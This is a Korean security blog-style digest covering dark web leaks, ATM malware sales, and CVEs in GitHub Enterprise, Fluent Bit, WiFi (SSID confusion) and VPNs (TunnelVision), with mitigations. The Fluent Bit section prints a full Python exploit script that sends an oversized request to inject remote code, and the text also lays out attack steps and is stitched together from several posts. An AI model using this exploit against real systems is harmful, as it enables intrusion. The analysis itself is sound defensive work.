- 인포스틸러에 의한 국내 주요 인터넷 강의 사이트 로그인 정보 및 계정 정보 4만 5천 건 다크웹 유출 > 로그인 정보 4만 5,352건, 사내 계정 정보 490건, 관련 문서 143건
- EvilQueen 해커조직, 국내 온라인 쇼핑몰 노려 7,089건 신용카드 정보 탈취 > 국내 온라인 쇼핑몰 웹사이트 50여개 결제창 위장해 이용자 정보 유출 > 플랫폼의 취약점과 여러 웹 취약점을 이용해 침투 후 피싱 페이지 삽입 (취약점이 확인된 구버전 PHP 사용, 2차 인증 없이 노출된 관리자 페이지, FTP 서비스 외부 오픈 등) > 유출된 정보는 카드번호, CVC, 유효기간, 카드 비밀번호, 주민등록번호, 휴대폰 번호 등 금융정보
- 의료금융 플랫폼 개인정보 유출 > 2020년경 해킹으로 유출된 데이터가 공개 > 유·노출된 개인정보는 학교명, 학년, 직업, 계정정보(네이버, 네이트, 한메일 등) 등 > 현재 해당 플랫폼은 정보보호 전담조직이 없는 것으로 파악
- 다크웹에서 국내 자동차 부품기업 핵심자료 거래 > 랜섬웨어 공격으로 재무제표, 인사 파일, 금융 관련 자료 등 포함
3. 대응방안
- 이용자는 주기적 계정 비밀번호 변경, 2단계 인증 적용 등 보안 강화 - 추가적인 유출 방지를 위해 새로운 보안 절차 수립, 솔루션 도입, 내부 교육 등 진행 - 정기적 백업, 최신 패치 유지, 망 분리, 임직원 보안인식 제고 등 필요
해외 기업 자료 유출
1. 개요
- 해외 빅테크 기업의 데이터 유출 확인
2. 주요내용
- 하드웨어 제조업체 Acer, 필리핀 지부 데이터 유출 > 필리핀과 공급 계약을 맺고 있는 서드파티 업체로부터 사건이 시작 > 고객 데이터는 안전하며, 직원들의 개인정보가 탈취된 것으로 확인
- 통신사 AT&T, 7300만 고객 정보 유출 > 2019년까지 가입된 고객들의 사회 보장 번호를 포함한 각종 개인정보 및 민감 정보가 다크웹 유출 > 현재 AT&T 이용 고객 760만명, 과거 AT&T를 이용해본 적이 있는 고객 6,540만
- 전자제품 제조 및 판매업체 Dell, 고객 정보 유출 > 고객 정보를 저장 및 관리하고 있는 델 내부 포털이 침해되었으며, 피해자 수는 공개되지 않음 > 고객의 이름, 거주지 주소, 델에서의 구매 이력 유출
3. 대응방안
- 증가하는 SW 공급망 공격에 대한 주의 및 철저한 대응 필요 (SW 공급망 보안 가이드라인 1.0 참고)
국제 공조, 일부 다크웹 폐쇄
1. 개요
- 국제 공조로 사이버 범죄 그룹 폐쇄
2. 주요내용
- 국제 공조로 록빗, 블랙캣, 네메시스마켓, 브리치포럼즈 등 폐쇄 > 록빗, 블랙캣이 운영하던 공격 인프라, 웹사이트 폐쇄 및 복호화 키 확보 및 공유 > 사이버 범죄 대행 서비스 네메시스마켓, 브리치포럼즈 폐쇄
3. 대응방안
- 새롭게 등장하는 다크웹 포럼 등에 대한 대응책 강구 필요
새로운 유형의 ATM 멀웨어 등장
1. 개요
- 다크웹에서 높은 성공률을 보이는 새로운 ATM 멀웨어가 거래
2. 주요내용
- 유럽 내 ATM 기기의 99%, 전 세계 ATM 약 60%를 침해할 수 있는 ATM 멀웨어 3만 달러에 적극 광고 > ATM 한 대 당 3만 달러의 수익을 보장 > 침해 가능 제조사: Diebold Nixdorf, 효성, Oki, Bank of America, NCR, GRG, Hitachi 등
- 유럽 ATM 99%를 감염시킬 수 있다고 주장하는 새로운 ATM 악성코드 등장 - 전 세계 ATM 약 60% 감염시킬 수 있다고 주장
내용
- 유럽 ATM 99%, 전 세계 ATM 60%를 감염시킬 수 있다고 주장하는 새로운 ATM 멀웨어 등장 > 이미 다크웹에는 3만 달러에 적극 광고되는 중 > 침해 가능 제조사: Diebold Nixdorf, 효성, Oki, Bank of America, NCR, GRG, Hitachi 등 > ATM 한 대 당 3만 달러의 수익을 보장
영향받는버전 - GitHub Enterprise Server 3.9.15 이전 버전 - GitHub Enterprise Server 3.10.12 이전 버전 - GitHub Enterprise Server 3.11.10 이전 버전 - GitHub Enterprise Server 3.12.4 이전 버전
2.1 주요 내용
- SAML SSO 인증과 선택적 암호화 어설션 기능을 사용하는 GHES 서버는 해당 취약점의 영향받음 (구체적인 내용 확인 불가)
> GHES가 암호화된 SAML 클레임을 처리하는 방식으로 발생하는 취약성을 이용
> 올바른 사용자 정보를 포함하는 가짜 SAML 클레임을 생성
> GHES가 가짜 SAML 클레임을 처리할 때 서명의 유효성을 올바르게 확인할 수 없어 공격자가 인스턴스에 엑세스 가능
SAML (Security Assertion Markup Language) [3]
- 하나의 자격 증명으로 한 번만 로그인하여 여러 앱에 액세스할 수 있도록 해 주는 기술 (Single Sign-On) - 인증 정보 제공자(Identity Provider, idP)와, 서비스 제공자(Service Provider, SP) 간의 인증 및 인가 데이터를 교환하기 위한 XML 기반의 표준 데이터 포맷
선택적 암호화 어설션 [4]
- IdP가 어설션 암호화를 지원하는 경우 인증 프로세스 중 보안 강화를 위해 GitHub Enterprise Server에서 암호화된 어설션을 구성
※ 암호화된 어설션은 Default로 비활성화되어 있으며, 다음 2 가지 경우는 취약점의 영향을 받지않음 ① 암호화된 어설션 없이 SAML SSO 인증을 사용하는 서버 ② SAML SSO를 사용하지 않는 서버
2.1 PoC [5]
- hxxps://your-ghes-instance[.]com: 대상 GHES 서버 URL
- 인공지능 프로젝트에 널리 사용되는 뉴럴컴프레서에서 원격 익스플로잇 취약점이 등장 - 인텔은 총 41개의 취약점을 공개 및 패치
내용
- 인텔이 자사 소프트웨어 일부에서 심각한 취약점을 발견해 경고 > 뉴럴컴프레서(Neural Compressor)라는 소프트웨어에서 발견된 CVE-2024-22476 (CVSS 10.0) 포함 > 총 41개의 취약점 공개 및 패치
- CVE-2024-22476 > 인텔의 뉴럴컴프레서 2.5.0 이전 버전에 영향 > 입력값을 제대로 확인하지 않아 발생 > CVSS 10.0 (익스플로잇 난이도가 낮고 원격에서도 공격이 가능하기 때문) > 데이터의 무결성과 가용성, 기밀성 모두에 큰 영향 > 공격자의 권한 상승과 사용자의 특정 행위를 유도할 필요 없음 ※ 뉴럴컴프레서 오픈소스 파이선 라이브러리 딥러닝 모델들을 압축하고 최적화 하는 데 주로 사용: 인공지능 기반 임무를 수행하는 데 있어 덜 중요한 매개변수들을 쳐냄으로써 메모리에 여유를 주는 것
기타
- 인공지능 기술의 인기와 더불어 공격자들의 관심 역시 증가 > 관련 도구들이 증가하고 있고, 도구들에서 취약점들이 계속 발굴 > 인공지능 제품이나 플랫폼의 구성 요소에서 취약점이 존재할 수 있다는것을 놓치면 안됨
- 오픈소스 멀티플랫폼 로그 프로세서 도구 - 로그를 수집, 처리하여 파이프라인을 통해 다양한 대상(Elasticsearch, Splunk 등)으로 전달하는 기능을 수행 - 메모리 사용량이 적고 의존성이 적어 가벼움 등 다양한 장점 - Google, Mircosoft, AWS, Cisco 등 여러 기업에서 사용
2. 취약점
[사진 1] CVE-2024-4323
- 취약한 버전의 Fluent Bit에서 발생하는 메모리 손상 취약점 (CVSS: 9.5) > 익스플로잇 방법에 따라 DDoS, 데이터 유출, 원격 코드 실행 공격 등이 가능
영향받는 버전 - Fluent Bit 2.0.7 ~ 3.0.3 버전
2.1 주요 내용
- 임베드 된 HTTP 서버가 일부 요청을 처리할 때 취약점이 발생
> /api/v1/traces (또는 /api/v1/trace) 엔드포인트에서 일정 유형의 입력 데이터가 적절히 확인되지 않은채 다른 프로그램으로 전달되어 취약성 발생
> 문자열이 아닌 값을 입력할 때 메모리에서 여러 가지 문제를 유발
> cd_traces() 함수에서 input_name 변수를 flb_sds_create_len() 함수를 이용해 할당 > 입력 값을 검증하지 않고 flb_sds_create_len() 함수 호출 및 사용하여 취약점이 발생하는 것으로 판단됨
※ 취약점 발생 시나리오 예시 - 큰 정수 값(또는 음수 값)은 메모리 보호를 위해 쓰기를 시도할 때 나중에 memcpy()를 호출할 때 "와일드 복사본"으로 인해 충돌 발생 가능 - -1~-16 값은 인접한 메모리의 힙 덮어쓰기를 유발할 수 있음 - 충돌할 만큼 크지 않은 정수 값은 요청을 하는 클라이언트에게 인접 메모리가 공개될 수 있음 - -17 값은 코드 후반부의 malloc()이 0으로 실패한 후 널 포인터 역참조로 인해 충돌이 발생 - 더 작고 더 많은 대상 정수 값은 다양한 스택 손상 및 힙 관리 메커니즘의 손상된 청크 및 끊어진 링크와 같은 기타 메모리 손상 문제를 유발
2.2 PoC [4]
- /traces URL에 BoF를 유발할 만큼 큰 임의의 문자와 원격 명령을 전달
import requests
import argparse
def exploit(url, port, remote_code):
target_url = f"http://{url}:{port}"
# Malicious payload to trigger the memory corruption
malicious_payload = (
"GET /traces HTTP/1.1\r\n"
f"Host: {url}\r\n"
"Content-Length: 1000000\r\n" # Large content length to trigger buffer overflow
"Connection: keep-alive\r\n\r\n"
+ "A" * 1000000 # Large amount of data to overflow the buffer
+ remote_code # Inject remote code at the end
)
try:
response = requests.post(target_url, data=malicious_payload, headers={"Content-Type": "application/octet-stream"})
print(f"Response Code: {response.status_code}")
print(f"Response Body: {response.text}")
except Exception as e:
print(f"Exploit failed: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Exploit for CVE-2024-4323")
parser.add_argument("-u", "--url", required=True, help="Target URL")
parser.add_argument("-p", "--port", required=True, help="Target port number")
parser.add_argument("-c", "--code", required=True, help="Remote code to be executed")
args = parser.parse_args()
exploit(args.url, args.port, args.code)
- WiFi 표준의 설계 결함으로 인해 SSID 혼동 공격이 발생할 수 있음 [1] - 피해자를 속여 취약한 네트워크에 연결시키거나 트래픽을 탈취할 수 있음 - IEEE 802.11 WiFi 표준 자체의 설계 결함으로 모든 장치 및 운영 체제의 WiFi 클라이언트에 영향
- 취약점의 근본 원인은 IEEE 802.11 표준이 클라이언트 연결 시 SSID(네트워크 이름)를 항상 인증하지 않는다는 것
> 즉, SSID 인증 부족을 악용해 피해자가 다른 Wi-Fi 네트워크에 연결하도록 속이는 것
- 인증 핸드셰이크 중 SSID를 사용하여 암호화키를 도출하는지 여부가 취약성 여부를 결정
인증 프로토콜
설명
WEP
- 취약한 RC4 알고리즘을 사용하기 때문으로 판단됨 > 키 스트림 편향 문제, 완전한 난수가 아닌 의사난수 사용 등
WPA3
- SAE 핸드셰이크에서 PMK를 생성하는데 SSID를 사용하지 않는 선택적 모드 존재 > SAE (Simultaneous Authentication of Equals): 두 장치가 공유한 임의의 숫자를 사용해 공유 키를 계산해 통신에 암호화 > PMK (Pairwise Master Key): SAE에 의해 생성되는 공유 키
802.11X/EAP
- PMK를 생성하기 위해 SSID를 사용하지 않음
AMPE
- 인증을 위해 802.1X를 사용하며, 802.1X는 SSID를 확인하지 않음
FILS
- PMK를 생성하는 데 사용되는 공유 키가 EAP 핸드셰이크에 의해 생성되는 경우 취약 - 또는, 캐시된 PMK를 사용하는 경우 피해자가 이전에 신뢰할 수 없는 대상 네트워크에 연결한 경우에만 취약
[사진 2] 취약 프로토콜 (주황색: 특정 조건 하 취약)
- 공격에 성공하기 위해서는 세 가지 조건이 존재
① 피해자는 신뢰할 수 있는 Wi-Fi 네트워크에 연결을 시도
② 신뢰할 수 있는 네트워크와 동일한 인증 자격 증명을 사용하는 악성 네트워크가 존재
③ 공격자는 피해자와 신뢰할 수 있는 네트워크 사이에서 MitM 공격을 수행할 수 있는 범위 내 위치
- 공격 과정은 다음과 같음
① 공격자는 신뢰할 수 있는 네트워크와 유사한(동일한 인증 자격 증명을 사용) 악성 AP 및 네트워크를 구성
② 악성 네트워크를 신뢰할 수 있는 네트워크로 가장하여(SSID 변경) 네트워크에 광고
③ 피해자의 Wi-Fi 클라이언트는 신뢰할 수 있는 네트워크와 연결된 것으로 착각(실제로는 악성 네트워크와 연결)
④ 공격자는 트래픽을 가로채 SSID를 변경해가며(신뢰<->악성) 중간자 공격을 수행
※ 일부 VPN 클라이언트의 경우 "신뢰할 수 있는" Wi-Fi 네트워크에 연결할 때 자동으로 VPN 연결 비활성화
> 일반적으로 VPN 설정에서 신뢰할 수 있는 SSID를 지정하여 사용
> SSID 혼동 공격이 성공하면 VPN이 비활성화되어 사용자 트래픽이 노출
[사진 3] SSID 혼동 공격 과정
대응방안
Wi-Fi 표준 개선
- 보호된 네트워크에 연결할 때 SSID 인증을 의무화하도록 표준 업데이트 > 4-Way 핸드셰이크 과정에서 SSID를 포함하도록 업데이트
Wi-Fi 클라이언트 개선
- 클라이언트 수준에서 비콘 보호 기능이 향상되면 공격 방어에 도움 > 비콘: 무선 액세스 포인트가 주기적으로 전송하여 자신의 존재를 알리는 관리 프레임 > 현재 논의중인 Wi-Fi 7은 비콘 보호에 대한 지원을 의무화
자격 증명 재사용 방지
- SSID 전체에서 자격 증명 재사용 방지 > 기업 네트워크는 고유한 RADIUS 서버 CommonName 사용 > 가정용 네트워크는 SSID 별로 고유한 비밀번호 사용
- 로컬 트래픽 비활성화 (단, 로컬 네트워크 사용이 불가해짐) - 라우팅할 수 없는 IP 주소에 대한 직접 액세스만 허용 (로컬 네트워크에 대한 액세스가 필수인 경우)
ServerIP
- 정책 기반 라우팅 (VPN 클라이언트를 제외한 모든 애플리케이션의 트래픽을 VPN 터널을 통해 전송) - 서버 IP 주소 확인 (클라이언트가 서버에 연결되면 VPN 서버의 IP 주소 확인) - 인증된 DNS 사용 (DNSSEC 등)
3. TunnelVision (CVE-2024-3661) [2][3]
- 24.05.06 VPN 트래픽을 훔쳐볼 수 있는 취약점이 발견
> DHCP의 설계 오류로 인해 발생
> IP 라우팅을 기반으로하는 모든 VPN 시스템에 통하는 공격으로 2 가지 조건을 가짐
① 공격자가 클라이언트의 DHCP 서버가 되어야 함
② 대상 호스트의 DHCP 클라이언트는 옵션 121을 구현해야 함
- DHCP Option 33 vs Option 121
> 1997년 DHCP RFC에는 관리자가 클라이언트의 라우팅 테이블에 설치할 고정 경로를 지정할 수 있는 옵션 33 존재
> 옵션 33은 Classful Static Routes를 사용하였고, 공용 IP 공간이 제한되면서 시간이 지남에 따라 선호되지 않음
> 2002년 RFC 3442에서 Classless Static Routes가 가능한 옵션 121 도입 (호환을 위해 옵션 33 유지)
> TunnelVision은 옵션 121를 악용해 공격
※ Android는 DHCP 옵션 121을 지원하지않아 영향받지 않음
[사진 6] TunnelVision 공격 과정 [4]
① 공격자는 정상 DHCP 서버에 DHCP 고갈 공격을 수행
> DHCP 고갈 공격: DHCP 서버에 MAC 주소를 변조하여 DHCP Discover 패킷을 계속 전송하여 IP 주소를 모두 소진하도록 하는 공격
> DHCP는 DHCP Discover 패킷의 MAC 주소만 보고 호스트 인식
② 공격자는 피해자와 동일한 네트워크에서 악성 DHCP를 운영
③ 악성 DHCP 서버는 옵션 121을 악용해 라우팅 테이블에 고정 경로를 구성
④ 공격자는 트래픽이 기본 게이트웨이로 전달되기 전에 암호화되지 않은 트래픽을 가로챌 수 있음
[사진 7] 옵션 121을 악용한 정적 경로 [4]
[영상 1] TunnelVision 공격 시연 영상 [5]
3.1 대응방안
구분
설명
DHCP Snooping
- DHCP 서버를 보호하기 위해 사용하는 기능 > 스위치에는 DHCP 서버 또는 DHCP Relay Agent가 접속된 Trusted Port와 DHCP 클라이언트가 접속된 Untrusted Port가 있음 > Untrusted Port에서 DHCP 응답 메시지를 확인하면 차단 (DHCP Spoofing 방지) > 또한, Ethernet 프레임의 SRC MAC 주소와 DHCP 메시지의 클라이언트 MAC 주소를 비교해 정상 여부 판단 (DHCP 고갈 공격 방지)
- CISA와 FBI가 소프트웨어 개발사들을 대상으로 긴급 권고문을 발표 - 소프트웨어 제품들을 출시하기 전에 경로 조작 취약점이 있는지 검토해 해결하라는 내용
내용
- 미국 공공 의료 서비스 분야에서 경로 탐색 취약점으로인해 침해사고가 발생 > CVE-2024-1708 : ConnectWise ScreenConnect 23.9.8 이전 버전에서 발생하는 경로 탐색 취약점 > CVE-2024-20345 : Cisco AppDynamics Controller의 파일 업로드 기능에서 사용자 입력값을 적절히 필터링하지 못해 발생하는 경로 탐색 취약점
> 입력값 필터링, 업로드 디렉터리 실행 권한 제거, 업로드 파일명 랜덤화 등 조치
※ 경로 탐색 취약점 (Directory Traversal Vulnerabilities) > 경로이동 문자열('../' 등)을 삽입하여 인증없이 특정 파일 또는 디렉토리에 접근할 수 있는 취약점
